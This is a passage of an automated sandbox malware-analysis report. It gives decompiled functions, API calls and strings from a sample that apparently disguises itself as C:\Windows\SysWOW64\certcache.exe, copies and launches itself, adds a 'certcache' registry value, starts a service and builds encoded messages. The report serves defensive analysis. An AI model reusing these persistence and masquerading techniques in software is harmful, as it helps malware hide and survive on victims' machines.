GetProcessHeap.KERNEL32(00000000), ref: 0013A6B9
HeapFree.KERNEL32(00000000), ref: 0013A6C0

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013A46E, Relevance: 13.6, APIs: 9, Instructions: 58

C-Code - Quality: 26%

			E0013A46E(void* __edi, void* __eflags) {
				signed int _t22;
				void* _t28;
				void* _t59;
				void* _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				_t59 = __edi;
				 *0x13c214();
				_t22 = GetTickCount();
				_t2 = (_t22 & 0x00000007) + 1; // 0x1
				L00132270(_t67 - 0x98, _t2);
				 *((short*)(_t67 + (_t22 & 0x00000007) * 2 - 0x96)) = 0;
				L00131830(0x1315a4, 0xc);
				_t63 =  *(_t67 - 4);
				_t28 = _t67 - 0x320;
				 *0x13c20c(_t28, 0x104, _t63, _t28, _t67 - 0x98, 0x6e15c1da, _t67 - 4);
				HeapFree(GetProcessHeap(), 0, _t63);
				_t64 = CreateFileW(_t67 - 0x320, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t64 != 0xffffffff) {
					goto 0x141e83;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					WriteFile();
					CloseHandle(_t64);
					L00131830(0x131398, 4);
					_t66 =  *(_t67 - 4);
					 *0x13c20c(_t67 - 0x528, 0x104, _t66, _t67 - 0x320, 0x6e15c1da, _t67 - 4);
					HeapFree(GetProcessHeap(), 0, _t66);
					_push(_t67 - 0x18);
					_push( *((intOrPtr*)(_t67 + 8)));
					if(L001321B0(_t67 - 0x528, _t59) != 0) {
						CloseHandle( *(_t67 - 0x18));
						CloseHandle( *(_t67 - 0x14));
					}
				}
				_push( *((intOrPtr*)(_t67 + 8)));
				CloseHandle();
				HeapFree(GetProcessHeap(), 0, _t59);
				return 0;
			}

0x0013a46e
0x0013a46e
0x0013a474
0x0013a485
0x0013a488
0x0013a494
0x0013a4aa
0x0013a4af
0x0013a4b9
0x0013a4c7
0x0013a4da
0x0013a4ff
0x0013a504
0x0013a50a
0x0013a50f
0x0013a510
0x0013a511
0x0013a512
0x0013a513
0x0013a514
0x0013a515
0x0013a51c
0x0013a535
0x0013a53a
0x0013a551
0x0013a564
0x0013a56d
0x0013a56e
0x0013a581
0x0013a586
0x0013a58f
0x0013a58f
0x0013a581
0x0013a595
0x0013a6b0
0x0013a6c0
0x0013a6ce

APIs

SHGetFolderPathW.SHELL32 ref: 0013A46E
GetTickCount.KERNEL32 ref: 0013A474
_snwprintf.NTDLL ref: 0013A4C7
GetProcessHeap.KERNEL32(00000000,?), ref: 0013A4D3
HeapFree.KERNEL32(00000000), ref: 0013A4DA
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0013A4F9
CloseHandle.KERNEL32(?), ref: 0013A6B0
GetProcessHeap.KERNEL32(00000000), ref: 0013A6B9
HeapFree.KERNEL32(00000000), ref: 0013A6C0

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013967F, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42string

APIs

lstrcmpiW.KERNEL32 ref: 00139686
memset.NTDLL ref: 001396AA
memset.NTDLL ref: 001396BB
SHFileOperationW.SHELL32(?), ref: 001396E6

Strings

C:\Windows\SysWOW64\certcache.exe, xrefs: 001396DE
C:\Windows\SysWOW64\certcache.exe, xrefs: 001396D0

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00139705, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33

APIs

GetTempPathW.KERNEL32 ref: 00139705
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00139717
SHFileOperationW.SHELL32(?), ref: 00139738
SHFileOperationW.SHELL32(?), ref: 00139764

Strings

C:\Windows\SysWOW64\certcache.exe, xrefs: 00139723, 0013975D
C:\Windows\SysWOW64\certcache.exe, xrefs: 00139756

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00139990, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31
process

C-Code - Quality: 25%

			E00139990() {
				int _t10;
				void* _t12;

				memset();
				 *(_t12 - 0x88) = 0x44;
				 *((intOrPtr*)(_t12 - 0x5c)) = 0x80;
				_t10 = CreateProcessW("C:\Windows\SysWOW64\certcache.exe", 0, 0, 0, 0, 0, 0, 0, _t12 - 0x88, _t12 - 0x30);
				if(_t10 != 0) {
					CloseHandle( *(_t12 - 0x30));
					_t10 = CloseHandle( *(_t12 - 0x2c));
				}
				goto 0x141bae;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				return _t10;
			}

0x00139990
0x00139999
0x001399a6
0x001399c8
0x001399d0
0x001399d5
0x001399de
0x001399de
0x001399e4
0x001399e9
0x001399ea
0x001399eb
0x001399ec
0x001399ed
0x001399ee
0x001399ef

APIs

memset.NTDLL ref: 00139990
CreateProcessW.KERNEL32(C:\Windows\SysWOW64\certcache.exe,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001399C8
CloseHandle.KERNEL32(?), ref: 001399D5
CloseHandle.KERNEL32(?), ref: 001399DE

Strings

C:\Windows\SysWOW64\certcache.exe, xrefs: 001399C3
D, xrefs: 00139999

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013A037, Relevance: 9.2, APIs: 6, Instructions: 161

C-Code - Quality: 100%

			E0013A037(unsigned int __eax, void* __ebx, void* __ecx, void* __edx, signed char* __edi) {
				unsigned int _t31;
				unsigned int _t32;
				long _t41;
				signed char _t52;
				signed char _t54;
				signed char _t56;
				signed char _t58;
				signed char _t60;
				void* _t62;
				intOrPtr* _t63;
				int _t65;
				int _t66;
				int _t67;
				void* _t68;
				signed char _t69;
				signed char _t71;
				signed char _t73;
				signed char _t75;
				signed char _t77;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				int _t83;
				signed char* _t84;
				void* _t86;
				char* _t89;
				signed char* _t91;
				signed char* _t92;
				void* _t93;
				char* _t94;
				signed char* _t95;
				void* _t96;
				char* _t97;
				signed char* _t98;
				void* _t99;
				char* _t100;
				signed char* _t101;
				void* _t103;

				_t84 = __edi;
				_t79 = __edx;
				_t68 = __ecx;
				_t62 = __ebx;
				_t31 = __eax;
				if(__eax > 0x7f) {
					do {
						_t31 = _t31 >> 7;
						_t62 = _t62 + 1;
					} while (_t31 > 0x7f);
				}
				_t32 = _t84[0x28];
				 *((intOrPtr*)(_t103 - 4)) = 1;
				while(_t32 > 0x7f) {
					 *((intOrPtr*)(_t103 - 4)) =  *((intOrPtr*)(_t103 - 4)) + 1;
					_t32 = _t32 >> 7;
				}
				_t63 =  *((intOrPtr*)(_t103 - 0xc));
				_t41 = _t84[0x28] + _t84[0x20] + _t84[0x18] + _t84[8] +  *((intOrPtr*)(_t103 - 4)) + _t62 + _t79 + _t68 +  *((intOrPtr*)(_t103 - 8)) + 0xf;
				 *(_t63 + 4) = _t41;
				_t89 = RtlAllocateHeap(GetProcessHeap(), 0, _t41);
				 *_t63 = _t89;
				if(_t89 != 0) {
					 *_t89 = 8;
					_t91 = _t89 + 1;
					_t69 =  *_t84;
					while(_t69 > 0x7f) {
						_t60 = _t69;
						_t69 = _t69 >> 7;
						 *_t91 = _t60 | 0x00000080;
						_t91 =  &(_t91[1]);
					}
					 *_t91 = _t69 & 0x0000007f;
					_t91[1] = 0x12;
					_t92 =  &(_t91[2]);
					_t65 = _t84[8];
					_t71 = _t65;
					_t80 = _t84[4];
					if(_t65 > 0x7f) {
						do {
							_t58 = _t71;
							_t71 = _t71 >> 7;
							 *_t92 = _t58 | 0x00000080;
							_t92 =  &(_t92[1]);
						} while (_t71 > 0x7f);
					}
					 *_t92 = _t71 & 0x0000007f;
					_t93 =  &(_t92[1]);
					memcpy(_t93, _t80, _t65);
					_t94 = _t93 + _t65;
					 *_t94 = 0x1d;
					 *(_t94 + 1) = _t84[0xc];
					 *((char*)(_t94 + 5)) = 0x25;
					 *(_t94 + 6) = _t84[0x10];
					 *((char*)(_t94 + 0xa)) = 0x2a;
					_t95 = _t94 + 0xb;
					_t66 = _t84[0x18];
					_t73 = _t66;
					_t81 = _t84[0x14];
					if(_t66 > 0x7f) {
						do {
							_t56 = _t73;
							_t73 = _t73 >> 7;
							 *_t95 = _t56 | 0x00000080;
							_t95 =  &(_t95[1]);
						} while (_t73 > 0x7f);
					}
					 *_t95 = _t73 & 0x0000007f;
					_t96 =  &(_t95[1]);
					memcpy(_t96, _t81, _t66);
					_t97 = _t96 + _t66;
					 *_t97 = 0x32;
					_t98 = _t97 + 1;
					_t67 = _t84[0x20];
					_t75 = _t67;
					_t82 = _t84[0x1c];
					if(_t67 > 0x7f) {
						do {
							_t54 = _t75;
							_t75 = _t75 >> 7;
							 *_t98 = _t54 | 0x00000080;
							_t98 =  &(_t98[1]);
						} while (_t75 > 0x7f);
					}
					 *_t98 = _t75 & 0x0000007f;
					_t99 =  &(_t98[1]);
					memcpy(_t99, _t82, _t67);
					_t100 = _t99 + _t67;
					 *_t100 = 0x3a;
					_t101 = _t100 + 1;
					_t83 = _t84[0x28];
					_t77 = _t83;
					_t86 = _t84[0x24];
					if(_t83 > 0x7f) {
						do {
							_t52 = _t77;
							_t77 = _t77 >> 7;
							 *_t101 = _t52 | 0x00000080;
							_t101 =  &(_t101[1]);
						} while (_t77 > 0x7f);
					}
					 *_t101 = _t77 & 0x0000007f;
					memcpy( &(_t101[1]), _t86, _t83);
					_t63 =  *((intOrPtr*)(_t103 - 0xc));
				}
				return 0 |  *_t63 != 0x00000000;
			}

0x0013a037
0x0013a037
0x0013a037
0x0013a037
0x0013a037
0x0013a03a
0x0013a040
0x0013a040
0x0013a043
0x0013a044
0x0013a040
0x0013a049
0x0013a04c
0x0013a056
0x0013a060
0x0013a063
0x0013a066
0x0013a07f
0x0013a089
0x0013a08e
0x0013a09e
0x0013a0a0
0x0013a0a4
0x0013a0aa
0x0013a0ad
0x0013a0ae
0x0013a0b3
0x0013a0b5
0x0013a0b7
0x0013a0bc
0x0013a0be
0x0013a0bf
0x0013a0c7
0x0013a0c9
0x0013a0cd
0x0013a0d0
0x0013a0d3
0x0013a0d5
0x0013a0db
0x0013a0e0
0x0013a0e0
0x0013a0e2
0x0013a0e7
0x0013a0e9
0x0013a0ea
0x0013a0e0
0x0013a0f3
0x0013a0f5
0x0013a0f8
0x0013a0fe
0x0013a103
0x0013a109
0x0013a10c
0x0013a113
0x0013a116
0x0013a11a
0x0013a11d
0x0013a120
0x0013a122
0x0013a128
0x0013a130
0x0013a130
0x0013a132
0x0013a137
0x0013a139
0x0013a13a
0x0013a130
0x0013a143
0x0013a145
0x0013a148
0x0013a14e
0x0013a153
0x0013a156
0x0013a157
0x0013a15a
0x0013a15c
0x0013a162
0x0013a164
0x0013a164
0x0013a166
0x0013a16b
0x0013a16d
0x0013a16e
0x0013a164
0x0013a177
0x0013a179
0x0013a17c
0x0013a182
0x0013a187
0x0013a18a
0x0013a18b
0x0013a18e
0x0013a190
0x0013a196
0x0013a198
0x0013a198
0x0013a19a
0x0013a19f
0x0013a1a1
0x0013a1a2
0x0013a198
0x0013a1ab
0x0013a1b0
0x0013a1b6
0x0013a1b9
0x0013a1c9

APIs

GetProcessHeap.KERNEL32(00000000,00000001), ref: 0013A091
RtlAllocateHeap.NTDLL(00000000), ref: 0013A098
memcpy.NTDLL(00000000,00000001,?), ref: 0013A0F8
memcpy.NTDLL(-0000000A,?,?), ref: 0013A148
memcpy.NTDLL(-00000008,?,?), ref: 0013A17C
memcpy.NTDLL(-00000006,?,?), ref: 0013A1B0

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013198B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24

C-Code - Quality: 39%

			E0013198B() {
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t15;

				asm("lahf");
				asm("int3");
				L00131830(_t11, _t12);
				_t13 =  *(_t15 - 4);
				 *0x13c20c(_t15 - 0x20c, 0x104, _t13, "C:\Windows\SysWOW64\certcache.exe", _t13);
				HeapFree(GetProcessHeap(), 0, _t13);
				return DeleteFileW(_t15 - 0x20c);
			}

0x0013198b
0x0013198c
0x0013198d
0x00131992
0x001319a8
0x001319bb
0x001319d2

APIs

_snwprintf.NTDLL ref: 001319A8
GetProcessHeap.KERNEL32(00000000,?), ref: 001319B4
HeapFree.KERNEL32(00000000), ref: 001319BB
DeleteFileW.KERNEL32(?), ref: 001319C8

Strings

C:\Windows\SysWOW64\certcache.exe, xrefs: 0013199C

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013992A, Relevance: 7.5, APIs: 5, Instructions: 17

C-Code - Quality: 27%

			E0013992A() {
				void* _t11;
				void* _t13;
				void* _t15;
				void* _t17;

				HeapFree(GetProcessHeap(), ??, ??);
				if( *((intOrPtr*)(_t17 - 8)) != 0) {
					 *0x13c088(_t15, 1, _t11);
					HeapFree(GetProcessHeap(), 0, _t11);
				}
				if(_t15 != 0) {
					StartServiceW();
					CloseServiceHandle(_t15);
				}
				CloseServiceHandle(_t13);
				return 1;
			}

0x00139931
0x0013993b
0x00139941
0x00139951
0x00139951
0x00139959
0x00139960
0x00139967
0x00139967
0x0013996e
0x0013997f

APIs

GetProcessHeap.KERNEL32 ref: 0013992A
HeapFree.KERNEL32(00000000), ref: 00139931
ChangeServiceConfig2W.ADVAPI32(?,00000001), ref: 00139941
GetProcessHeap.KERNEL32(00000000,?,?,00000001), ref: 0013994A
HeapFree.KERNEL32(00000000), ref: 00139951
CloseServiceHandle.ADVAPI32 ref: 0013996E

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00139A53, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29
registry

C-Code - Quality: 56%

			E00139A53(signed int __ebx, void* __eflags) {
				int _t14;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t23;

				_t19 = __ebx;
				asm("lahf");
				asm("int3");
				L00131830(_t21, _t22);
				if(RegCreateKeyExW(0x80000001,  *(_t23 - 4), 0, 0, 0, 2, 0, _t23 - 0xc, 0) == 0) {
					RegSetValueExW( *(_t23 - 0xc), "certcache", 0, 1, _t23 - 0x214, 2 + _t19 * 2);
					RegCloseKey( *(_t23 - 0xc));
				}
				HeapFree(GetProcessHeap(), ??, ??);
				_t14 = HeapFree(GetProcessHeap(), ??, ??);
				goto 0x141c47;
				return _t14;
			}

0x00139a53
0x00139a53
0x00139a54
0x00139a55
0x00139a7d
0x00139a9a
0x00139aa3
0x00139aa3
0x00139ab5
0x00139ac7
0x00139ace
0x00139ad3

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00139A75
RegSetValueExW.ADVAPI32(00000000,certcache,00000000,00000001,?,00000000), ref: 00139A9A
RegCloseKey.ADVAPI32(?), ref: 00139AA3

Strings

certcache, xrefs: 00139A92

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00138A5E, Relevance: 6.1, APIs: 4, Instructions: 60

C-Code - Quality: 35%

			E00138A5E(void* __ecx, void* __edx, void* __edi, signed char __esi, void* __eflags) {
				void* _t19;
				intOrPtr _t20;
				signed char _t25;
				void* _t27;
				intOrPtr _t31;
				void* _t32;
				void _t34;
				signed char _t35;
				signed char _t38;
				signed int _t43;
				intOrPtr _t46;
				signed char _t47;
				void* _t48;

				L0:
				while(1) {
					L0:
					_t47 = __esi;
					_t45 = __edi;
					_t20 = L00131F70(_t19, __ecx, __edx);
					 *((intOrPtr*)(__edi + 8)) = _t20;
					if(_t20 == 0) {
						goto L17;
					}
					L11:
					_t31 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
					 *((intOrPtr*)(__edi + 0xc)) = _t31;
					if(_t31 == 0) {
						L15:
						goto 0x1417a5;
						asm("int3");
						asm("int3");
						_push( *((intOrPtr*)(_t45 + 8)));
						L16:
						asm("adc eax, 0x13c178");
						goto L17;
					} else {
						L12:
						goto 0x141789;
						asm("int3");
						asm("int3");
						asm("int3");
						L13:
						asm("lahf");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t32 = CreateThread(??, ??, ??, ??, ??, ??);
						 *(__edi + 0x10) = _t32;
						if(_t32 == 0) {
							goto L15;
						} else {
							L14:
							 *((intOrPtr*)(__edi + 4)) =  *((intOrPtr*)(_t48 - 0x18));
							_t34 =  *0x13c274; // 0x0
							 *__edi = _t34;
							 *0x13c274 = __edi;
							do {
								L1:
								_t46 =  *((intOrPtr*)(_t48 - 4));
								L2:
								_t43 = 0;
								_t38 = 0;
								 *(_t48 - 8) = 0;
								_t35 = 0x80;
								if(_t47 < _t46) {
									while(1) {
										L3:
										_t35 =  *_t47;
										_t47 = _t47 + 1;
										_t43 = _t43 | (_t35 & 0x7f) << _t38;
										if(_t35 >= 0) {
											break;
										}
										L4:
										_t38 = _t38 + 7;
										if(_t47 < _t46) {
											continue;
										}
										break;
									}
									L5:
									 *(_t48 - 8) = _t43;
								}
								L6:
								_t25 =  !((_t35 & 0x000000ff) >> 7);
								if((_t25 & 0x00000001) != 0) {
									L7:
									_t25 = _t43 + _t47;
									if(_t25 <= _t46) {
										L8:
										 *(_t48 - 0xc) = _t47;
										_t47 = _t25;
										_t25 = L00138800(_t48 - 0xc, _t48 - 0x18);
										if(_t25 != 0) {
											goto L9;
										}
									}
								}
								L18:
								goto 0x1417ba;
								asm("int3");
								return _t25;
								L9:
								_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
								_t45 = _t27;
							} while (_t27 == 0);
							goto 0x141775;
							asm("int3");
							continue;
						}
					}
					L19:
					L17:
					HeapFree(GetProcessHeap(), 0, _t45);
					goto L1;
				}
			}

0x00138a5e
0x00138a5e
0x00138a5e
0x00138a5e
0x00138a5e
0x00138a5e
0x00138a63
0x00138a68
0x00000000
0x00000000
0x00138a6a
0x00138a71
0x00138a73
0x00138a76
0x00138aab
0x00138aab
0x00138ab0
0x00138ab1
0x00138ab2
0x00138ab4
0x00138ab6
0x00000000
0x00138a78
0x00138a78
0x00138a78
0x00138a7d
0x00138a7e
0x00138a7f
0x00138a80
0x00138a80
0x00138a81
0x00138a82
0x00138a83
0x00138a84
0x00138a85
0x00138a86
0x00138a8c
0x00138a91
0x00000000
0x00138a93
0x00138a93
0x00138a96
0x00138a99
0x00138a9e
0x00138aa0
0x001389e3
0x001389e3
0x001389e3
0x001389e6
0x001389e6
0x001389e8
0x001389ea
0x001389ed
0x001389f1
0x001389f3
0x001389f3
0x001389f3
0x001389f5
0x001389fe
0x00138a02
0x00000000
0x00000000
0x00138a04
0x00138a04
0x00138a09
0x00000000
0x00000000
0x00000000
0x00138a09
0x00138a0b
0x00138a0b
0x00138a0b
0x00138a0e
0x00138a14
0x00138a18
0x00138a1e
0x00138a1e
0x00138a23
0x00138a29
0x00138a29
0x00138a32
0x00138a34
0x00138a3b
0x00000000
0x00000000
0x00138a3b
0x00138a23
0x00138ad0
0x00138ad0
0x00138ad5
0x00138ad6
0x00138a41
0x00138a4c
0x00138a52
0x00138a54
0x00138a58
0x00138a5d
0x00000000
0x00138a5d
0x00138a91
0x00000000
0x00138abb
0x00138ac5
0x00000000
0x00138ac5

APIs

GetProcessHeap.KERNEL32(00000008,00000014), ref: 00138A45
RtlAllocateHeap.NTDLL(00000000), ref: 00138A4C
GetProcessHeap.KERNEL32(00000000), ref: 00138ABE
HeapFree.KERNEL32(00000000), ref: 00138AC5

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00138AB4, Relevance: 6.1, APIs: 4, Instructions: 51

C-Code - Quality: 43%

			E00138AB4(void* __ebx, void* __edi, signed char __esi) {
				signed char _t21;
				intOrPtr _t27;
				intOrPtr _t30;
				void* _t31;
				void _t33;
				signed char _t36;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				void* _t45;
				signed char _t46;
				void* _t47;

				L0:
				while(1) {
					L0:
					_t46 = __esi;
					asm("adc eax, 0x13c178");
					while(1) {
						L17:
						HeapFree(GetProcessHeap(), 0, _t45);
						while(1) {
							L1:
							_t44 =  *((intOrPtr*)(_t47 - 4));
							L2:
							_t41 = 0;
							_t37 = 0;
							 *(_t47 - 8) = 0;
							_t36 = 0x80;
							if(_t46 < _t44) {
								while(1) {
									L3:
									_t36 =  *_t46;
									_t46 = _t46 + 1;
									_t41 = _t41 | (_t36 & 0x7f) << _t37;
									if(_t36 >= 0) {
										break;
									}
									L4:
									_t37 = _t37 + 7;
									if(_t46 < _t44) {
										continue;
									}
									break;
								}
								L5:
								 *(_t47 - 8) = _t41;
							}
							L6:
							_t21 =  !((_t36 & 0x000000ff) >> 7);
							if((_t21 & 0x00000001) != 0) {
								L7:
								_t21 = _t41 + _t46;
								if(_t21 <= _t44) {
									L8:
									 *(_t47 - 0xc) = _t46;
									_t42 = _t47 - 0x18;
									_t38 = _t47 - 0xc;
									_t46 = _t21;
									_t21 = L00138800(_t47 - 0xc, _t47 - 0x18);
									if(_t21 != 0) {
										L9:
										_t45 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
										if(_t45 == 0) {
											L1:
											_t44 =  *((intOrPtr*)(_t47 - 4));
											goto L2;
										} else {
											L10:
											goto 0x141775;
											asm("int3");
											L11:
											_t27 = L00131F70(_t23, _t38, _t42);
											 *((intOrPtr*)(_t45 + 8)) = _t27;
											if(_t27 == 0) {
												L17:
												HeapFree(GetProcessHeap(), 0, _t45);
												continue;
											} else {
												L12:
												_t30 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
												 *((intOrPtr*)(_t45 + 0xc)) = _t30;
												if(_t30 == 0) {
													L16:
													goto 0x1417a5;
													asm("int3");
													asm("int3");
													_push( *((intOrPtr*)(_t45 + 8)));
													goto L0;
												} else {
													L13:
													goto 0x141789;
													asm("int3");
													asm("int3");
													asm("int3");
													L14:
													asm("lahf");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_t31 = CreateThread(??, ??, ??, ??, ??, ??);
													 *(_t45 + 0x10) = _t31;
													if(_t31 == 0) {
														goto L16;
													} else {
														L15:
														 *((intOrPtr*)(_t45 + 4)) =  *((intOrPtr*)(_t47 - 0x18));
														_t33 =  *0x13c274; // 0x0
														 *_t45 = _t33;
														 *0x13c274 = _t45;
														do {
															goto L1;
														} while (_t45 == 0);
														goto L10;
													}
												}
											}
										}
										L19:
									}
								}
							}
							L18:
							goto 0x1417ba;
							asm("int3");
							return _t21;
						}
					}
				}
			}

0x00138ab4
0x00138ab4
0x00138ab4
0x00138ab4
0x00138ab6
0x00138abb
0x00138abb
0x00138ac5
0x001389e3
0x001389e3
0x001389e3
0x001389e6
0x001389e6
0x001389e8
0x001389ea
0x001389ed
0x001389f1
0x001389f3
0x001389f3
0x001389f3
0x001389f5
0x001389fe
0x00138a02
0x00000000
0x00000000
0x00138a04
0x00138a04
0x00138a09
0x00000000
0x00000000
0x00000000
0x00138a09
0x00138a0b
0x00138a0b
0x00138a0b
0x00138a0e
0x00138a14
0x00138a18
0x00138a1e
0x00138a1e
0x00138a23
0x00138a29
0x00138a29
0x00138a2c
0x00138a2f
0x00138a32
0x00138a34
0x00138a3b
0x00138a41
0x00138a52
0x00138a56
0x001389e3
0x001389e3
0x00000000
0x00138a58
0x00138a58
0x00138a58
0x00138a5d
0x00138a5e
0x00138a5e
0x00138a63
0x00138a68
0x00138abb
0x00138ac5
0x00000000
0x00138a6a
0x00138a6a
0x00138a71
0x00138a73
0x00138a76
0x00138aab
0x00138aab
0x00138ab0
0x00138ab1
0x00138ab2
0x00000000
0x00138a78
0x00138a78
0x00138a78
0x00138a7d
0x00138a7e
0x00138a7f
0x00138a80
0x00138a80
0x00138a81
0x00138a82
0x00138a83
0x00138a84
0x00138a85
0x00138a86
0x00138a8c
0x00138a91
0x00000000
0x00138a93
0x00138a93
0x00138a96
0x00138a99
0x00138a9e
0x00138aa0
0x001389e3
0x00000000
0x00000000
0x00000000
0x001389e3
0x00138a91
0x00138a76
0x00138a68
0x00000000
0x00138a56
0x00138a3b
0x00138a23
0x00138ad0
0x00138ad0
0x00138ad5
0x00138ad6
0x00138ad6
0x001389e3
0x00138abb

APIs

GetProcessHeap.KERNEL32(00000008,00000014), ref: 00138A45
RtlAllocateHeap.NTDLL(00000000), ref: 00138A4C
GetProcessHeap.KERNEL32(00000000), ref: 00138ABE
HeapFree.KERNEL32(00000000), ref: 00138AC5

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013850C, Relevance: 6.0, APIs: 4, Instructions: 32

C-Code - Quality: 76%

			E0013850C(intOrPtr __ecx, void* __edx, long* __edi) {
				void* _t4;
				void* _t9;
				void* _t17;
				void* _t19;

				_t9 = __edx;
				 *((intOrPtr*)(_t19 - 4)) = __ecx;
				_t4 = RtlAllocateHeap(GetProcessHeap(), 0,  *__edi);
				_t17 = _t4;
				if(_t17 == 0) {
					L4:
					goto 0x1415de;
					asm("int3");
					return _t4;
				} else {
					_push(_t9);
					_push( *((intOrPtr*)(_t19 - 4)));
					if(L00132DB0(_t17, __edi) == 0) {
						_t4 = _t17;
						goto L4;
					} else {
						HeapFree(GetProcessHeap(), 0, _t17);
						return 0;
					}
				}
			}

0x0013850c
0x0013850e
0x0013851c
0x00138522
0x00138526
0x00138557
0x00138557
0x0013855c
0x0013855d
0x00138528
0x00138528
0x00138529
0x0013853a
0x00138555
0x00000000
0x0013853c
0x00138546
0x00138554
0x00138554
0x0013853a

APIs

GetProcessHeap.KERNEL32(00000000), ref: 00138515
RtlAllocateHeap.NTDLL(00000000), ref: 0013851C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0013853F
HeapFree.KERNEL32(00000000), ref: 00138546

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

